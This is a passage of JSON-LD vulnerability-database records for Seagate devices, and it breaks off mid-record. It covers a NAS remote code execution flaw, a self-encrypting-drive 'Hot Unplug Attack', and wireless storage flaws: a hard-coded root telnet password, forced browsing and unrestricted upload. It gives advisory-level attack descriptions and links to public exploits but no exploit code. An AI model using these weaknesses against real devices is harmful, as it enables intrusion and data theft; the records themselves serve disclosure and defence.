          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2014-8687",
            "trust": 2.9
          },
          {
            "db": "PACKETSTORM",
            "id": "130585",
            "trust": 2.6
          },
          {
            "db": "BID",
            "id": "72831",
            "trust": 2.1
          },
          {
            "db": "PACKETSTORM",
            "id": "130609",
            "trust": 1.8
          },
          {
            "db": "EXPLOIT-DB",
            "id": "36264",
            "trust": 1.8
          },
          {
            "db": "EXPLOIT-DB",
            "id": "36202",
            "trust": 1.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008320",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-218",
            "trust": 0.7
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-89325",
            "trust": 0.1
          },
          {
            "db": "SEEBUG",
            "id": "SSVID-89319",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-76632",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-8687",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-76632"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-8687"
          },
          {
            "db": "BID",
            "id": "72831"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008320"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-218"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-8687"
          }
        ]
      },
      "id": "VAR-201706-0189",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-76632"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-20T23:24:54.175000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.seagate.com/"
          },
          {
            "title": "sbar",
            "trust": 0.1,
            "url": "https://github.com/dino213dz/sbar "
          },
          {
            "title": "The Register",
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2015/03/10/seagate_that_remote_0day_aint_so_bad_well_patch_it_in_two_months/"
          },
          {
            "title": "The Register",
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2015/03/02/seagate_nas_owner_hide_it_behind_a_firewall/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-8687"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008320"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-327",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-76632"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008320"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-8687"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "http://packetstormsecurity.com/files/130585/seagate-business-nas-2014.00319-remote-code-execution.html"
          },
          {
            "trust": 1.9,
            "url": "http://www.securityfocus.com/bid/72831"
          },
          {
            "trust": 1.9,
            "url": "https://www.exploit-db.com/exploits/36202/"
          },
          {
            "trust": 1.8,
            "url": "https://www.exploit-db.com/exploits/36264/"
          },
          {
            "trust": 1.8,
            "url": "http://packetstormsecurity.com/files/130609/seagate-business-nas-unauthenticated-remote-command-execution.html"
          },
          {
            "trust": 1.8,
            "url": "https://beyondbinary.io/articles/seagate-nas-rce/"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8687"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8687"
          },
          {
            "trust": 0.3,
            "url": "https://beyondbinary.io/advisory/seagate-nas-rce/"
          },
          {
            "trust": 0.3,
            "url": "http://www.seagate.com/gb/en/support/external-hard-drives/network-storage/business-storage-2-bay-nas/"
          },
          {
            "trust": 0.3,
            "url": "http://www.seagate.com/gb/en/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/327.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/dino213dz/sbar"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-76632"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-8687"
          },
          {
            "db": "BID",
            "id": "72831"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008320"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-218"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-8687"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-76632"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-8687"
          },
          {
            "db": "BID",
            "id": "72831"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008320"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-218"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-8687"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-06-08T00:00:00",
            "db": "VULHUB",
            "id": "VHN-76632"
          },
          {
            "date": "2017-06-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-8687"
          },
          {
            "date": "2015-03-01T00:00:00",
            "db": "BID",
            "id": "72831"
          },
          {
            "date": "2017-07-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-008320"
          },
          {
            "date": "2015-03-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201503-218"
          },
          {
            "date": "2017-06-08T16:29:00.247000",
            "db": "NVD",
            "id": "CVE-2014-8687"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-06-16T00:00:00",
            "db": "VULHUB",
            "id": "VHN-76632"
          },
          {
            "date": "2017-06-16T00:00:00",
            "db": "VULMON",
            "id": "CVE-2014-8687"
          },
          {
            "date": "2015-03-01T00:00:00",
            "db": "BID",
            "id": "72831"
          },
          {
            "date": "2017-07-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2014-008320"
          },
          {
            "date": "2017-06-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201503-218"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2014-8687"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-218"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate Business NAS Vulnerability to execute arbitrary code in device firmware",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-008320"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201503-218"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201711-0011

    Vulnerability from variot - Updated: 2025-04-20 23:24

    Seagate ST500LT015 hard disk drives, when operating in eDrive mode on Lenovo ThinkPad W541 laptops with BIOS 2.21, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by attaching a second SATA connector to exposed pins, maintaining an alternate power source, and attaching the data cable to another machine, aka a "Hot Unplug Attack." Vulnerabilities exist in Seagate ST500LT015 hard disk drives that allow security features to be bypassed. Information may be obtained. The Lenovo ThinkPad W541 laptop with BIOS 2.21 is a notebook computer from China's Lenovo that uses BIOS version 2.21. The Seagate ST500LT015 hard disk drive is a hard drive made by Seagate, a United States company. There is a security hole in the Seagate ST500LT015 hard disk drive on the Lenovo ThinkPad W541 laptop with BIOS version 2.21. This may aid in further attacks.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201711-0011",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "st500lt015",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "st500lt015",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "st500lt015",
            "scope": null,
            "trust": 0.6,
            "vendor": "lenovo",
            "version": null
          },
          {
            "model": "st500lt015",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "0"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38307"
          },
          {
            "db": "BID",
            "id": "102266"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008066"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1080"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7269"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:seagate:st500lt015_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008066"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The vendor reported this issue.",
        "sources": [
          {
            "db": "BID",
            "id": "102266"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2015-7269",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 1.9,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 3.4,
                "id": "CVE-2015-7269",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 1.9,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.4,
                "id": "CNVD-2017-38307",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 1.9,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 3.4,
                "id": "VHN-85230",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:L/AC:M/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "PHYSICAL",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.2,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 0.5,
                "id": "CVE-2015-7269",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-7269",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2015-7269",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-38307",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201711-1080",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "VULHUB",
                "id": "VHN-85230",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38307"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85230"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008066"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1080"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7269"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate ST500LT015 hard disk drives, when operating in eDrive mode on Lenovo ThinkPad W541 laptops with BIOS 2.21, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by attaching a second SATA connector to exposed pins, maintaining an alternate power source, and attaching the data cable to another machine, aka a \"Hot Unplug Attack.\". Seagate ST500LT015 Vulnerabilities exist in the hard disk drives that bypass security features.Information may be obtained. LenovoThinkPadW541laptopswithBIOS2.21 is a notebook computer of China Lenovo (Lenovo) that uses BIOS 2.21 version. SeagateST500LT015harddiskdrive is a hard drive made by Seagate, a computer used in the United States. There is a security hole in the SeagateST500LT015harddiskdrive on the Lenovo ThinkPad W541 laptop with BIOS version 2.21. This may aid in further attacks",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-7269"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008066"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38307"
          },
          {
            "db": "BID",
            "id": "102266"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85230"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2015-7269",
            "trust": 3.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008066",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1080",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38307",
            "trust": 0.6
          },
          {
            "db": "BID",
            "id": "102266",
            "trust": 0.4
          },
          {
            "db": "VULHUB",
            "id": "VHN-85230",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38307"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85230"
          },
          {
            "db": "BID",
            "id": "102266"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008066"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1080"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7269"
          }
        ]
      },
      "id": "VAR-201711-0011",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38307"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85230"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38307"
          }
        ]
      },
      "last_update_date": "2025-04-20T23:24:51.935000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.seagate.com/jp/ja/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008066"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-254",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-85230"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008066"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7269"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://www.blackhat.com/docs/eu-15/materials/eu-15-boteanu-bypassing-self-encrypting-drives-sed-in-enterprise-environments-wp.pdf"
          },
          {
            "trust": 2.0,
            "url": "https://www.infoworld.com/article/3004913/encryption/self-encrypting-drives-are-hardly-any-better-than-software-based-encryption.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7269"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7269"
          },
          {
            "trust": 0.3,
            "url": "https://www.seagate.com"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38307"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85230"
          },
          {
            "db": "BID",
            "id": "102266"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008066"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1080"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7269"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38307"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85230"
          },
          {
            "db": "BID",
            "id": "102266"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008066"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1080"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7269"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-12-28T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-38307"
          },
          {
            "date": "2017-11-27T00:00:00",
            "db": "VULHUB",
            "id": "VHN-85230"
          },
          {
            "date": "2017-11-27T00:00:00",
            "db": "BID",
            "id": "102266"
          },
          {
            "date": "2018-01-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-008066"
          },
          {
            "date": "2017-11-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201711-1080"
          },
          {
            "date": "2017-11-27T22:29:00.333000",
            "db": "NVD",
            "id": "CVE-2015-7269"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-12-28T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-38307"
          },
          {
            "date": "2017-12-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-85230"
          },
          {
            "date": "2017-11-27T00:00:00",
            "db": "BID",
            "id": "102266"
          },
          {
            "date": "2018-01-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-008066"
          },
          {
            "date": "2017-11-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201711-1080"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2015-7269"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "local",
        "sources": [
          {
            "db": "BID",
            "id": "102266"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1080"
          }
        ],
        "trust": 0.9
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate ST500LT015 of  HDD Vulnerabilities bypassing security functions",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008066"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1080"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201512-0526

    Vulnerability from variot - Updated: 2025-04-13 21:32

    Unrestricted file upload vulnerability on Seagate GoFlex Satellite, Seagate Wireless Mobile Storage, Seagate Wireless Plus Mobile Storage, and LaCie FUEL devices with firmware before 3.4.1.105 allows remote attackers to execute arbitrary code by uploading a file to /media/sda2 during a Wi-Fi session. There are multiple vulnerabilities in the wireless storage products offered by Seagate. Hard-coded authentication information (password) (CWE-798) - CVE-2015-2874: a telnet service that is not described in the manual is running and is accessible with the username "root" and the default password. CWE-798: Use of Hard-coded Credentials https://cwe.mitre.org/data/definitions/798.html In the National Vulnerability Database (NVD), this issue is published as CWE-255. Direct request (Forced Browsing) (CWE-425) - CVE-2015-2875: by default, anyone can download files when accessing the device wirelessly. Any file on the file system can be downloaded directly. CWE-425: Direct Request ('Forced Browsing') https://cwe.mitre.org/data/definitions/425.html In the National Vulnerability Database (NVD), this issue is published as CWE-22. Unrestricted upload of dangerous file types (CWE-434) - CVE-2015-2876: when accessing the device wirelessly with default settings, files can be uploaded to the /media/sda2 file system. This file system is provided for file sharing. CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.html A remote attacker can access arbitrary files on the product, and the product may be operated with root privileges. Seagate 36C devices running firmware versions 2.2.0.005 and 2.3.0.014 are vulnerable.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201512-0526",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "wireless mobile storage",
            "scope": null,
            "trust": 1.4,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "wireless plus mobile storage",
            "scope": null,
            "trust": 1.4,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "wireless mobile storage",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": "*"
          },
          {
            "model": "goflex sattelite",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": "*"
